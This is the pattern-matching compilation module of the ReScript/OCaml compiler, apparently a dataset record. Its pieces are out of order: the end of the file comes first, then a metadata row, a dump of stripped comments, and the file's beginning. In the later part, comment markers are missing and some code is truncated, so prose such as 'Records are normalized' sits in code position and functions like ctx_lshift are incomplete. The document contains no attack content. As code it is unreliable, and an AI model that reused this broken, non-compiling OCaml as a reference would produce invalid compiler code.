  | Llet (str, k, id, rhs, body) -> Llet (str, k, id, rhs, map_return f body)
  | Lletrec (decls, body) -> Lletrec (decls, map_return f body)
  | Lifthenelse (cond, ifso, ifnot) ->
      Lifthenelse (cond, map_return f ifso, map_return f ifnot)
  | Lsequence (e1, e2) -> Lsequence (e1, map_return f e2)
  | Ltrywith (body, exn, handler) ->
      Ltrywith (map_return f body, exn, map_return f handler)
  | Lstaticcatch (body, hdl_ids, handler) ->
      Lstaticcatch (map_return f body, hdl_ids, map_return f handler)
  | Lstaticraise _ | Lprim (Praise _, _, _) -> lam
  | _ -> f lam
(* The 'opt' reference indicates if the optimization is worthy.

   It is shared by the different calls to 'assign_pat' performed from
   'map_return'. For example with the code
     let (x, y) = if foo then z else (1,2)
   the else-branch will activate the optimization for both branches.

   That means that the optimization is activated if *there exists* an
   interesting tuple in one hole of the let-rhs context. We could
   choose to activate it only if *all* holes are interesting. We made
   that choice because being optimistic is extremely cheap (one static
   exit/catch overhead in the "wrong cases"), while being pessimistic
   can be costly (one unnecessary tuple allocation).
*)
(* Destructure [pat] against [lam] while avoiding the allocation of
   intermediate tuples.  [opt] is set when at least one immediate tuple
   was found (i.e. the optimization is worthwhile), [nraise] is the
   exit number jumping to the let body, and [catch_ids] the variables
   bound by that exit.
   NOTE(review): the two interior comments below had lost their "(*"
   openers during an earlier mangling, leaving bare prose in code
   position; they are restored here — the executable code is unchanged. *)
let assign_pat opt nraise catch_ids loc pat lam =
  let rec collect acc pat lam = match pat.pat_desc, lam with
  | Tpat_tuple patl, Lprim(Pmakeblock _, lams, _) ->
      opt := true;
      List.fold_left2 collect acc patl lams
  | Tpat_tuple patl, Lconst(Const_block( _, scl)) ->
      opt := true;
      let collect_const acc pat sc = collect acc pat (Lconst sc) in
      List.fold_left2 collect_const acc patl scl
  | _ ->
    (* pattern idents will be bound in (let body), so we
       refresh them here to guarantee binders uniqueness *)
      let pat_ids = pat_bound_idents pat in
      let fresh_ids = List.map (fun id -> id, Ident.rename id) pat_ids in
      (fresh_ids, alpha_pat fresh_ids pat, lam) :: acc
  in
  (* sublets were accumulated by 'collect' with the leftmost tuple
     pattern at the bottom of the list; to respect right-to-left
     evaluation order for tuples, we must evaluate sublets
     top-to-bottom. To preserve tail-rec, we will fold_left the
     reversed list. *)
  let rev_sublets = List.rev (collect [] pat lam) in
  let exit =
    (* build an Ident.tbl to avoid quadratic refreshing costs *)
    let add t (id, fresh_id) = Ident.add id fresh_id t in
    let add_ids acc (ids, _pat, _lam) = List.fold_left add acc ids in
    let tbl = List.fold_left add_ids Ident.empty rev_sublets in
    let fresh_var id = Lvar (Ident.find_same id tbl) in
    Lstaticraise(nraise, List.map fresh_var catch_ids)
  in
  let push_sublet code (_ids, pat, lam) = simple_for_let loc lam pat code in
  List.fold_left push_sublet exit rev_sublets
(* Bind the pattern [pat] to [param] in [body].  Wildcard and variable
   patterns use the obvious direct code; otherwise we try the
   immediate-tuple optimization (assign_pat/map_return), falling back
   on [simple_for_let] when no immediate tuple is found.
   NOTE(review): the comment in the Tpat_any arm had lost its "(*"
   opener during an earlier mangling; restored here — the executable
   code is unchanged. *)
let for_let loc param pat body =
  match pat.pat_desc with
  | Tpat_any ->
      (* This eliminates a useless variable (and stack slot in bytecode)
         for "let _ = ...". See #6865. *)
      Lsequence(param, body)
  | Tpat_var (id, _) ->
      (* fast path, and keep track of simple bindings to unboxable numbers *)
      Llet(Strict, Pgenval, id, param, body)
  | _ ->
      (* Turn off such optimization to reduce diff in the beginning - FIXME *)
      if !Config.bs_only then simple_for_let loc param pat body
      else
        let opt = ref false in
        let nraise = next_raise_count () in
        let catch_ids = pat_bound_idents pat in
        let bind = map_return (assign_pat opt nraise catch_ids loc pat) param in
        if !opt then Lstaticcatch(bind, (nraise, catch_ids), body)
        else simple_for_let loc param pat body
(* Handling of tupled functions and matchings *)
(* Easy case since variables are available *)
(* Entry point for tupled functions: each clause carries one pattern
   per parameter, and every parameter is already a variable. *)
let for_tupled_function loc paraml pats_act_list partial =
  let partial = check_partial_list pats_act_list partial in
  let raise_num = next_raise_count () in
  (* default row: one wildcard per parameter *)
  let omegas = [List.map (fun _ -> omega) paraml] in
  let pm =
    { cases = pats_act_list;
      args = List.map (fun id -> (Lvar id, Strict)) paraml ;
      default = [omegas,raise_num]
    } in
  try
    let (lambda, total) = compile_match None partial
        (start_ctx (List.length paraml)) pm in
    check_total total lambda raise_num (partial_function loc)
  with
  | Unused -> partial_function loc ()
(* Explode one pattern into a line of [size] column patterns; only
   tuples and wildcards can be flattened. *)
let flatten_pattern size pat = match pat.pat_desc with
  | Tpat_any -> omegas size
  | Tpat_tuple args -> args
  | _ -> raise Cannot_flatten
(* Flatten one pattern line of width [size] onto [k]: tuples are
   exploded, wildcards become [size] wildcards, and or-patterns
   contribute one line per branch.
   NOTE(review): the Tpat_alias arm had been destroyed by comment
   mangling (only its comment text and a dangling recursive call
   remained); the arm is restored here from the upstream source. *)
let rec flatten_pat_line size p k = match p.pat_desc with
| Tpat_any -> omegas size::k
| Tpat_tuple args -> args::k
| Tpat_or (p1,p2,_) -> flatten_pat_line size p1 (flatten_pat_line size p2 k)
| Tpat_alias (p,_,_) ->
    (* Note: if this 'as' pat is here, then this is a
       useless binding, solves PR#3780 *)
    flatten_pat_line size p k
| _ -> fatal_error "Matching.flatten_pat_line"
(* Flatten every clause of a matrix whose rows are singleton patterns. *)
let flatten_cases size cases =
  let flatten_clause (ps, action) = match ps with
    | [p] -> flatten_pattern size p, action
    | _ -> fatal_error "Matching.flatten_case"
  in
  List.map flatten_clause cases
(* Flatten a matrix of singleton rows into a matrix of width [size]. *)
let flatten_matrix size pss =
  let flatten_row ps rest = match ps with
    | [p] -> flatten_pat_line size p rest
    | _ -> fatal_error "Matching.flatten_matrix"
  in
  List.fold_right flatten_row pss []
(* Flatten every matrix of a default environment. *)
let flatten_def size def =
  List.map (fun (pss, i) -> (flatten_matrix size pss, i)) def
(* Flatten a whole pattern matching, substituting the new arguments. *)
let flatten_pm size args pm =
  { cases = flatten_cases size pm.cases ;
    args = args ;
    default = flatten_def size pm.default }
(* Flatten a half-compiled matching.  PmVar cannot occur at this stage
   (the matching was produced by split_precompile on a tuple column). *)
let flatten_precompiled size args pmh = match pmh with
  | Pm pm -> Pm (flatten_pm size args pm)
  | PmOr {body ; handlers ; or_matrix} ->
      let flatten_handler (mat, i, vars, pm) =
        (flatten_matrix size mat, i, vars, pm) in
      PmOr
        { body = flatten_pm size args body ;
          handlers = List.map flatten_handler handlers ;
          or_matrix = flatten_matrix size or_matrix }
  | PmVar _ -> assert false
(* compiled_flattened is a ``comp_fun'' argument to comp_match_handlers.
   Hence it needs a fourth argument, which it ignores.
*)
(* Compile an already-flattened half-compiled matching.  The fourth
   (ignored) argument gives this function the ``comp_fun'' shape that
   comp_match_handlers expects. *)
let compile_flattened repr partial ctx _ pmh = match pmh with
  | Pm pm -> compile_match repr partial ctx pm
  | PmOr {body ; handlers} ->
      let lam, total = compile_match repr partial ctx body in
      compile_orhandlers (compile_match repr partial) lam total ctx handlers
  | PmVar _ -> assert false
(* Compile a match over several simultaneous values.  First try the
   flattened scheme, which avoids allocating the intermediate tuple;
   fall back on a genuine tuple match when flattening is impossible.
   NOTE(review): the final [with Unused ->] handler had been reduced to
   comment residue by an earlier mangling (a syntax error); its body,
   [assert false] with the commented-out alternative, is restored from
   the upstream source. *)
let do_for_multiple_match loc paraml pat_act_list partial =
  let repr = None in
  let partial = check_partial pat_act_list partial in
  let raise_num,pm1 =
    match partial with
    | Partial ->
        let raise_num = next_raise_count () in
        raise_num,
        { cases = List.map (fun (pat, act) -> ([pat], act)) pat_act_list;
          args = [Lprim(Pmakeblock( Blk_tuple), paraml, loc), Strict];
          default = [[[omega]],raise_num] }
    | _ ->
        (* Total: no default row; -1 is a never-used exit number *)
        -1,
        { cases = List.map (fun (pat, act) -> ([pat], act)) pat_act_list;
          args = [Lprim(Pmakeblock( Blk_tuple), paraml, loc), Strict];
          default = [] } in
  try
    try
      (* Once for checking that compilation is possible *)
      let next, nexts = split_precompile None pm1 in
      let size = List.length paraml
      and idl = List.map (fun _ -> Ident.create "match") paraml in
      let args = List.map (fun id -> Lvar id, Alias) idl in
      let flat_next = flatten_precompiled size args next
      and flat_nexts =
        List.map
          (fun (e,pm) -> e,flatten_precompiled size args pm)
          nexts in
      let lam, total =
        comp_match_handlers
          (compile_flattened repr)
          partial (start_ctx size) () flat_next flat_nexts in
      List.fold_right2 (bind Strict) idl paraml
        (match partial with
        | Partial ->
            check_total total lam raise_num (partial_function loc)
        | Total ->
            assert (jumps_is_empty total) ;
            lam)
    with Cannot_flatten ->
      (* fallback: compile the match on the allocated tuple *)
      let (lambda, total) = compile_match None partial (start_ctx 1) pm1 in
      begin match partial with
      | Partial ->
          check_total total lambda raise_num (partial_function loc)
      | Total ->
          assert (jumps_is_empty total) ;
          lambda
      end
  with Unused ->
    assert false (* ; partial_function loc () *)
(* PR#4828: Believe it or not, the 'paraml' argument below
may not be side effect free. *)
(* Name a parameter expression: variables are kept as is, anything else
   gets a fresh ident and the expression to bind it to. *)
let param_to_var param = match param with
  | Lvar v -> (v, None)
  | _ -> (Ident.create "match", Some param)

(* Bind the extracted expression around [k], if any. *)
let bind_opt (v, eo) k =
  match eo with
  | Some e -> Lambda.bind Strict v e k
  | None -> k
(* Entry point for matching several values at once.  Parameters that
   are not already variables are bound to fresh idents first, so any
   side effects in them are performed exactly once. *)
let for_multiple_match loc paraml pat_act_list partial =
  let v_paraml = List.map param_to_var paraml in
  let paraml = List.map (fun (v,_) -> Lvar v) v_paraml in
  List.fold_right bind_opt v_paraml
    (do_for_multiple_match loc paraml pat_act_list partial)
| null | https://raw.githubusercontent.com/rescript-lang/rescript-compiler/5da6c88fb9237fbc4d61640187b82627690ccf39/jscomp/ml/matching.ml | ocaml | ************************************************************************
OCaml
en Automatique.
All rights reserved. This file is distributed under the terms of
special exception on linking described in the file LICENSE.
************************************************************************
Compilation of pattern matching
Many functions on the various data structures of the algorithm :
- Pattern matrices.
- Default environments: mapping from matrices to exit numbers.
- Contexts: matrices whose column are partitioned into
left and right.
- Jump summaries: mapping from exit numbers to contexts
Context pruning
Pattern matching before any compilation
Pattern matching after application of both the or-pat rule and the
mixture rule
prerr_string " -> " ;
Printlambda.lambda Format.str_formatter l ;
prerr_string (Format.flush_str_formatter ()) ;
Identifying some semantically equivalent lambda-expressions,
Our goal here is also to
find alpha-equivalent (simple) terms
Introduce a catch, if worth it
Introduce a catch, if worth it, delayed version
Once matchings are simplified one can easily find
their nature
applies to simplified matchings only
A few operations on default environments
Or-pattern expansion, variables are a complication w.r.t. the article
Basic grouping predicates
Conditions for appending to the Or matrix
Insert or append a pattern in the Or matrix
attempt insert, for equivalent orpats with no variables
check append condition for head of O
check insert condition for tail of O
insert
fail to insert or append
check condition (b) for append
p # q, go on with append/insert
q is not an or-pat, go on with append/insert
[] in fact
success in appending
Could not success in raising up a constr matching up
This enables an extra division in some frequent cases :
last row is made of variables only
as splitted as it can
Precompile
Compute top information
If you need
General divide functions
Matching against a constructor
Matching against a variant
Matching against a variable
Matching and forcing a lazy value
Inlining the tag tests before calling the primitive that works on
lazy blocks. This is also used in translcore.ml.
No other call than Obj.tag when the value has been forced before.
Matching against a tuple pattern
Matching against a record pattern
Matching against an array pattern
Sequential equality tests
Dichotomic tree
Entry point
********************
********************
Add handler, if shared
Default action is always shared
Store all other actions
Retrieve all actions, including potential default
Array of actual actions
Reconstruct default and switch list
Note: dichotomic search requires sorted input with no duplicates
Attempt sharing on all actions
Fail is translated to exit, whatever happens
Reintroduce fail action in switch argument,
for the sake of avoiding carrying over huge switches
In case there is some hole and that a switch is emitted,
action 0 will be used as the action of unreachable
cases (cf. switch.ml, make_switch).
Hence, this action will be shared
Act as Total, this means
If no appropriate default matrix exists,
then this switch cannot fail
In line with the article and simpler than before
Too many non-matched constructors -> reduced information
Note as the bytecode compiler may resort to dichotomic search,
the clauses of stringswitch are sorted with duplicates removed.
This partly applies to the native code compiler, which requires
no duplicates
refine [split_cases] and [split_variant_cases]
Special cases for extensions
Regular concrete type
Identical actions, no failure
Typically, match on lists, will avoid isint primitive in that
case
The type defines constant constructors only
= Some act when all non-const constructors match to act
Emit a switch, as bytecode implements this sophisticated instruction
reduandant work under bs context
One can compare integers and pointers
One must not dereference integers
Insertion of debugging events
Attempt to avoid some useless bindings by lowering them
Approximation of v present in lam
eliminate let *sth* = from_option x in *sth*
Hum, -1 means never taken
| (-1,pm)::rem -> c_rec body total_body rem
To find reasonable names for variables
To be set by Lam_compile
verbose version of do_compile_matching, for debug
The entry points
Downgrade Total when
1. Matching accesses some mutable fields;
2. And there are guards or lazy patterns.
allow empty case list
have toplevel handler when appropriate
; handler_fun()
[Location.get_pos_info] is too expensive
sublets were accumulated by 'collect' with the leftmost tuple
pattern at the bottom of the list; to respect right-to-left
evaluation order for tuples, we must evaluate sublets
top-to-bottom. To preserve tail-rec, we will fold_left the
reversed list.
fast path, and keep track of simple bindings to unboxable numbers
Turn off such optimization to reduce diff in the beginning - FIXME
Handling of tupled functions and matchings
Easy case since variables are available
Once for checking that compilation is possible
PR#4828: Believe it or not, the 'paraml' argument below
may not be side effect free. | , projet Cristal , INRIA Rocquencourt
Copyright 1996 Institut National de Recherche en Informatique et
the GNU Lesser General Public License version 2.1 , with the
open Misc
open Asttypes
open Types
open Typedtree
open Lambda
open Parmatch
open Printf
let dbg = false
See Peyton - Jones , ` ` The Implementation of functional programming
languages '' , chapter 5 .
languages'', chapter 5. *)
Well , it was true at the beginning of the world .
Now , see Lefessant - Maranget ` ` Optimizing Pattern - Matching '' ICFP'2001
Well, it was true at the beginning of the world.
Now, see Lefessant-Maranget ``Optimizing Pattern-Matching'' ICFP'2001
*)
Compatibility predicate that considers potential rebindings of constructors
of an extension type .
" may_compat p q " returns false when p and q never admit a common instance ;
returns true when they may have a common instance .
Compatibility predicate that considers potential rebindings of constructors
of an extension type.
"may_compat p q" returns false when p and q never admit a common instance;
returns true when they may have a common instance.
*)
module MayCompat =
Parmatch.Compat (struct let equal = Types.may_equal_constr end)
let may_compat = MayCompat.compat
and may_compats = MayCompat.compats
let string_of_lam lam =
Printlambda.lambda Format.str_formatter lam ;
Format.flush_str_formatter ()
type matrix = pattern list list
let add_omega_column pss = List.map (fun ps -> omega::ps) pss
type ctx = {left:pattern list ; right:pattern list}
let pretty_ctx ctx =
List.iter
(fun {left=left ; right=right} ->
prerr_string "LEFT:" ;
pretty_line left ;
prerr_string " RIGHT:" ;
pretty_line right ;
prerr_endline "")
ctx
let le_ctx c1 c2 =
le_pats c1.left c2.left &&
le_pats c1.right c2.right
let lshift {left=left ; right=right} = match right with
| x::xs -> {left=x::left ; right=xs}
| _ -> assert false
let lforget {left=left ; right=right} = match right with
| _::xs -> {left=omega::left ; right=xs}
| _ -> assert false
let rec small_enough n = function
| [] -> true
| _::rem ->
if n <= 0 then false
else small_enough (n-1) rem
let ctx_lshift ctx =
if small_enough 31 ctx then
List.map lshift ctx
get_mins le_ctx (List.map lforget ctx)
end
let rshift {left=left ; right=right} = match left with
| p::ps -> {left=ps ; right=p::right}
| _ -> assert false
let ctx_rshift ctx = List.map rshift ctx
let rec nchars n ps =
if n <= 0 then [],ps
else match ps with
| p::rem ->
let chars, cdrs = nchars (n-1) rem in
p::chars,cdrs
| _ -> assert false
let rshift_num n {left=left ; right=right} =
let shifted,left = nchars n left in
{left=left ; right = shifted@right}
let ctx_rshift_num n ctx = List.map (rshift_num n) ctx
Recombination of contexts ( eg : ( _ , _ ): : p1::p2::rem - > ( )
All mutable fields are replaced by ' _ ' , since side - effects in
guards can alter these fields
All mutable fields are replaced by '_', since side-effects in
guards can alter these fields *)
let combine {left=left ; right=right} = match left with
| p::ps -> {left=ps ; right=set_args_erase_mutable p right}
| _ -> assert false
let ctx_combine ctx = List.map combine ctx
let ncols = function
| [] -> 0
| ps::_ -> List.length ps
exception NoMatch
exception OrPat
let filter_matrix matcher pss =
let rec filter_rec = function
| (p::ps)::rem ->
begin match p.pat_desc with
| Tpat_alias (p,_,_) ->
filter_rec ((p::ps)::rem)
| Tpat_var _ ->
filter_rec ((omega::ps)::rem)
| _ ->
begin
let rem = filter_rec rem in
try
matcher p ps::rem
with
| NoMatch -> rem
| OrPat ->
match p.pat_desc with
| Tpat_or (p1,p2,_) -> filter_rec [(p1::ps) ;(p2::ps)]@rem
| _ -> assert false
end
end
| [] -> []
| _ ->
pretty_matrix pss ;
fatal_error "Matching.filter_matrix" in
filter_rec pss
let make_default matcher env =
let rec make_rec = function
| [] -> []
| ([[]],i)::_ -> [[[]],i]
| (pss,i)::rem ->
let rem = make_rec rem in
match filter_matrix matcher pss with
| [] -> rem
| ([]::_) -> ([[]],i)::rem
| pss -> (pss,i)::rem in
make_rec env
let ctx_matcher p =
let p = normalize_pat p in
match p.pat_desc with
| Tpat_construct (_, cstr,omegas) ->
(fun q rem -> match q.pat_desc with
| Tpat_construct (_, cstr',args)
NB : may_constr_equal considers ( potential ) constructor rebinding
when Types.may_equal_constr cstr cstr' ->
p,args@rem
| Tpat_any -> p,omegas @ rem
| _ -> raise NoMatch)
| Tpat_constant cst ->
(fun q rem -> match q.pat_desc with
| Tpat_constant cst' when const_compare cst cst' = 0 ->
p,rem
| Tpat_any -> p,rem
| _ -> raise NoMatch)
| Tpat_variant (lab,Some omega,_) ->
(fun q rem -> match q.pat_desc with
| Tpat_variant (lab',Some arg,_) when lab=lab' ->
p,arg::rem
| Tpat_any -> p,omega::rem
| _ -> raise NoMatch)
| Tpat_variant (lab,None,_) ->
(fun q rem -> match q.pat_desc with
| Tpat_variant (lab',None,_) when lab=lab' ->
p,rem
| Tpat_any -> p,rem
| _ -> raise NoMatch)
| Tpat_array omegas ->
let len = List.length omegas in
(fun q rem -> match q.pat_desc with
| Tpat_array args when List.length args = len -> p,args @ rem
| Tpat_any -> p, omegas @ rem
| _ -> raise NoMatch)
| Tpat_tuple omegas ->
let len = List.length omegas in
(fun q rem -> match q.pat_desc with
| Tpat_tuple args when List.length args = len -> p,args @ rem
| Tpat_any -> p, omegas @ rem
| _ -> raise NoMatch)
Records are normalized
let len = Array.length lbl.lbl_all in
(fun q rem -> match q.pat_desc with
| Tpat_record (((_, lbl', _) :: _) as l',_)
when Array.length lbl'.lbl_all = len ->
let l' = all_record_args l' in
p, List.fold_right (fun (_, _,p) r -> p::r) l' rem
| Tpat_any -> p,List.fold_right (fun (_, _,p) r -> p::r) l rem
| _ -> raise NoMatch)
| Tpat_lazy omega ->
(fun q rem -> match q.pat_desc with
| Tpat_lazy arg -> p, (arg::rem)
| Tpat_any -> p, (omega::rem)
| _ -> raise NoMatch)
| _ -> fatal_error "Matching.ctx_matcher"
let filter_ctx q ctx =
let matcher = ctx_matcher q in
let rec filter_rec = function
| ({right=p::ps} as l)::rem ->
begin match p.pat_desc with
| Tpat_or (p1,p2,_) ->
filter_rec ({l with right=p1::ps}::{l with right=p2::ps}::rem)
| Tpat_alias (p,_,_) ->
filter_rec ({l with right=p::ps}::rem)
| Tpat_var _ ->
filter_rec ({l with right=omega::ps}::rem)
| _ ->
begin let rem = filter_rec rem in
try
let to_left, right = matcher p ps in
{left=to_left::l.left ; right=right}::rem
with
| NoMatch -> rem
end
end
| [] -> []
| _ -> fatal_error "Matching.filter_ctx" in
filter_rec ctx
let select_columns pss ctx =
let n = ncols pss in
List.fold_right
(fun ps r ->
List.fold_right
(fun {left=left ; right=right} r ->
let transfert, right = nchars n right in
try
{left = lubs transfert ps @ left ; right=right}::r
with
| Empty -> r)
ctx r)
pss []
let ctx_lub p ctx =
List.fold_right
(fun {left=left ; right=right} r ->
match right with
| q::rem ->
begin try
{left=left ; right = lub p q::rem}::r
with
| Empty -> r
end
| _ -> fatal_error "Matching.ctx_lub")
ctx []
let ctx_match ctx pss =
List.exists
(fun {right=qs} -> List.exists (fun ps -> may_compats qs ps) pss)
ctx
type jumps = (int * ctx list) list
let pretty_jumps (env : jumps) = match env with
| [] -> ()
| _ ->
List.iter
(fun (i,ctx) ->
Printf.fprintf stderr "jump for %d\n" i ;
pretty_ctx ctx)
env
let rec jumps_extract (i : int) = function
| [] -> [],[]
| (j,pss) as x::rem as all ->
if i=j then pss,rem
else if j < i then [],all
else
let r,rem = jumps_extract i rem in
r,(x::rem)
let rec jumps_remove (i:int) = function
| [] -> []
| (j,_)::rem when i=j -> rem
| x::rem -> x::jumps_remove i rem
let jumps_empty = []
and jumps_is_empty = function
| [] -> true
| _ -> false
let jumps_singleton i = function
| [] -> []
| ctx -> [i,ctx]
let jumps_add i pss jumps = match pss with
| [] -> jumps
| _ ->
let rec add = function
| [] -> [i,pss]
| (j,qss) as x::rem as all ->
if (j:int) > i then x::add rem
else if j < i then (i,pss)::all
else (i,(get_mins le_ctx (pss@qss)))::rem in
add jumps
let rec jumps_union (env1:(int*ctx list)list) env2 = match env1,env2 with
| [],_ -> env2
| _,[] -> env1
| ((i1,pss1) as x1::rem1), ((i2,pss2) as x2::rem2) ->
if i1=i2 then
(i1,get_mins le_ctx (pss1@pss2))::jumps_union rem1 rem2
else if i1 > i2 then
x1::jumps_union rem1 env2
else
x2::jumps_union env1 rem2
let rec merge = function
| env1::env2::rem -> jumps_union env1 env2::merge rem
| envs -> envs
let rec jumps_unions envs = match envs with
| [] -> []
| [env] -> env
| _ -> jumps_unions (merge envs)
let jumps_map f env =
List.map
(fun (i,pss) -> i,f pss)
env
type pattern_matching =
{ mutable cases : (pattern list * lambda) list;
args : (lambda * let_kind) list ;
default : (matrix * int) list}
type pm_or_compiled =
{body : pattern_matching ;
handlers : (matrix * int * Ident.t list * pattern_matching) list ;
or_matrix : matrix ; }
type pm_half_compiled =
| PmOr of pm_or_compiled
| PmVar of pm_var_compiled
| Pm of pattern_matching
and pm_var_compiled =
{inside : pm_half_compiled ; var_arg : lambda ; }
type pm_half_compiled_info =
{me : pm_half_compiled ;
matrix : matrix ;
top_default : (matrix * int) list ; }
(* Debug printer: one line per clause, patterns separated by spaces. *)
let pretty_cases cases =
  List.iter
    (fun (ps,_l) ->
      List.iter
        (fun p ->
          Parmatch.top_pretty Format.str_formatter p ;
          prerr_string " " ;
          prerr_string (Format.flush_str_formatter ()))
        ps ;
      prerr_endline "")
    cases

(* Debug printer for default (exit) matrices. *)
let pretty_def def =
  prerr_endline "+++++ Defaults +++++" ;
  List.iter
    (fun (pss,i) ->
      Printf.fprintf stderr "Matrix for %d\n" i ;
      pretty_matrix pss)
    def ;
  prerr_endline "+++++++++++++++++++++"

let pretty_pm pm =
  pretty_cases pm.cases ;
  if pm.default <> [] then
    pretty_def pm.default

(* Debug printer for half-compiled matchings; recurses through PmVar. *)
let rec pretty_precompiled = function
  | Pm pm ->
      prerr_endline "++++ PM ++++" ;
      pretty_pm pm
  | PmVar x ->
      prerr_endline "++++ VAR ++++" ;
      pretty_precompiled x.inside
  | PmOr x ->
      prerr_endline "++++ OR ++++" ;
      pretty_pm x.body ;
      pretty_matrix x.or_matrix ;
      List.iter
        (fun (_,i,_,pm) ->
          eprintf "++ Handler %d ++\n" i ;
          pretty_pm pm)
        x.handlers

(* Dump a split result: top matching followed by its defaults. *)
let pretty_precompiled_res first nexts =
  pretty_precompiled first ;
  List.iter
    (fun (e, pmh) ->
      eprintf "** DEFAULT %d **\n" e ;
      pretty_precompiled pmh)
    nexts
(* Sharing of identical actions is desirable; however, as shown by
   earlier bug reports, such sharing may hinder the
   lambda-code invariant that all bound idents are unique,
   when switches are compiled to test sequences.
   The definitive fix is the systematic introduction of exit/catch
   in case action sharing is present.
*)
(* Store for sharing actions: actions are keyed with Lambda.make_key,
   so semantically identical actions map to the same index. *)
module StoreExp =
  Switch.Store
    (struct
      type t = lambda
      type key = lambda
      let compare_key = compare
      let make_key = Lambda.make_key
    end)

(* A static raise to exit [i] with no arguments. *)
let make_exit i = Lstaticraise (i,[])

(* Wrap continuation [k] in a catch whose handler is the default
   action [d]; when [d] is already a bare exit, reuse it directly. *)
let make_catch d k = match d with
| Lstaticraise (_,[]) -> k d
| _ ->
    let e = next_raise_count () in
    Lstaticcatch (k (make_exit e),(e,[]),d)
(* View a handler as a bare exit number, looking through Alias lets. *)
let rec as_simple_exit = function
  | Lstaticraise (i,[]) -> Some i
  | Llet (Alias,_k,_,_,e) -> as_simple_exit e
  | _ -> None

(* Delayed counterpart of make_catch: return an exit number and a
   function that will later wrap a body in the corresponding catch.
   When the handler is already a simple exit, no new catch is needed.
   Fix: the commented-out debug print below had lost its `(*` opener
   during extraction (leaving a duplicated, syntax-breaking line);
   the comment delimiters are restored and the duplicate dropped. *)
let make_catch_delayed handler = match as_simple_exit handler with
| Some i -> i,(fun act -> act)
| None ->
    let i = next_raise_count () in
(*
    Printf.eprintf "SHARE LAMBDA: %i\n%s\n" i (string_of_lam handler);
*)
    i,
    (fun body -> match body with
      | Lstaticraise (j,_) ->
          if i=j then handler else body
      | _ -> Lstaticcatch (body,(i,[]),handler))
(* Replace an action by its shared key when one exists. *)
let raw_action l =
  match make_key l with | Some l -> l | None -> l

(* Like make_key, but raise Exit when the action cannot be keyed. *)
let tr_raw act = match make_key act with
| Some act -> act
| None -> raise Exit

(* If all clauses share the same action (up to keying), return it. *)
let same_actions = function
  | [] -> None
  | [_,act] -> Some act
  | (_,act0) :: rem ->
      try
        let raw_act0 = tr_raw act0 in
        let rec s_rec = function
          | [] -> Some act0
          | (_,act)::rem ->
              if raw_act0 = tr_raw act then
                s_rec rem
              else
                None in
        s_rec rem
      with
      | Exit -> None
(* Test for swapping two clauses *)
(* Two actions are interchangeable when their keyed forms are equal. *)
let up_ok_action act1 act2 =
  try
    let raw1 = tr_raw act1
    and raw2 = tr_raw act2 in
    raw1 = raw2
  with
  | Exit -> false

(* Clause (ps,act_p) may be swapped above every clause of [l]: either
   the actions coincide, or the pattern rows are incompatible. *)
let up_ok (ps,act_p) l =
  List.for_all
    (fun (qs,act_q) ->
      up_ok_action act_p act_q || not (may_compats ps qs))
    l
(*
  The simplify function normalizes the first column of the match
    - records are expanded so that they possess all fields
    - aliases are removed and replaced by bindings in actions.
  However or-patterns are simplified differently,
    - aliases are not removed
    - or-patterns (_|p) are changed into _
*)
(* Raised internally by simplify_or when a sub-pattern matches anything. *)
exception Var of pattern

(* Simplify or-pattern [p]: expand records to all their fields and
   collapse alternatives subsumed by a variable/wildcard (the Var
   escape propagates the subsuming pattern upwards). *)
let simplify_or p =
  let rec simpl_rec p = match p with
    | {pat_desc = Tpat_any|Tpat_var _} -> raise (Var p)
    | {pat_desc = Tpat_alias (q,id,s)} ->
        begin try
          {p with pat_desc = Tpat_alias (simpl_rec q,id,s)}
        with
        | Var q -> raise (Var {p with pat_desc = Tpat_alias (q,id,s)})
        end
    | {pat_desc = Tpat_or (p1,p2,o)} ->
        let q1 = simpl_rec p1 in
        begin try
          let q2 = simpl_rec p2 in
          {p with pat_desc = Tpat_or (q1, q2, o)}
        with
        | Var q2 -> raise (Var {p with pat_desc = Tpat_or (q1, q2, o)})
        end
    | {pat_desc = Tpat_record (lbls,closed)} ->
        let all_lbls = all_record_args lbls in
        {p with pat_desc=Tpat_record (all_lbls, closed)}
    | _ -> p in
  try
    simpl_rec p
  with
  | Var p -> p
(* Normalize the first column of the clauses w.r.t. argument [arg]:
   variables and aliases become Alias lets in the action, empty and
   partial record patterns are expanded, or-patterns are simplified
   (cf. simplify_or). *)
let simplify_cases args cls = match args with
| [] -> assert false
| (arg,_)::_ ->
    let rec simplify = function
      | [] -> []
      | ((pat :: patl, action) as cl) :: rem ->
          begin match pat.pat_desc with
          | Tpat_var (id, _) ->
              (omega :: patl, bind Alias id arg action) ::
              simplify rem
          | Tpat_any ->
              cl :: simplify rem
          | Tpat_alias(p, id,_) ->
              simplify ((p :: patl, bind Alias id arg action) :: rem)
          | Tpat_record ([],_) ->
              (omega :: patl, action)::
              simplify rem
          | Tpat_record (lbls, closed) ->
              let all_lbls = all_record_args lbls in
              let full_pat =
                {pat with pat_desc=Tpat_record (all_lbls, closed)} in
              (full_pat::patl,action)::
              simplify rem
          | Tpat_or _ ->
              let pat_simple = simplify_or pat in
              begin match pat_simple.pat_desc with
              | Tpat_or _ ->
                  (pat_simple :: patl, action) ::
                  simplify rem
              | _ ->
                  (* simplification removed the or: reprocess the row *)
                  simplify ((pat_simple::patl,action) :: rem)
              end
          | _ -> cl :: simplify rem
          end
      | _ -> assert false in
    simplify cls
(* First head pattern that is not a wildcard; clauses are assumed
   simplified, so variables, or-patterns and aliases in head position
   are impossible.
   Fix: the second case had lost its `-> assert false` body (the line
   was stripped together with its comment during extraction), leaving
   two consecutive pattern lines and a syntax error. *)
let rec what_is_cases cases = match cases with
| ({pat_desc=Tpat_any} :: _, _) :: rem -> what_is_cases rem
| (({pat_desc=(Tpat_var _|Tpat_or (_,_,_)|Tpat_alias (_,_,_))}::_),_)::_
  -> assert false (* applies to simplified matchings only *)
| (p::_,_)::_ -> p
| [] -> omega
| _ -> assert false
(* Pattern matrix of a clause list, minimized w.r.t. le_pats. *)
let as_matrix cases = get_mins le_pats (List.map (fun (ps,_) -> ps) cases)

(* Prepend (matrix,raise_num) to the default list, unless empty. *)
let cons_default matrix raise_num default =
  match matrix with
  | [] -> default
  | _ -> (matrix,raise_num)::default

(* Restrict default matrices to rows whose head may be compatible
   with [p], dropping the head column; empty restrictions vanish. *)
let default_compat p def =
  List.fold_right
    (fun (pss,i) r ->
      let qss =
        List.fold_right
          (fun qs r -> match qs with
            | q::rem when may_compat p q -> rem::r
            | _ -> r)
          pss [] in
      match qss with
      | [] -> r
      | _ -> (qss,i)::r)
    def []
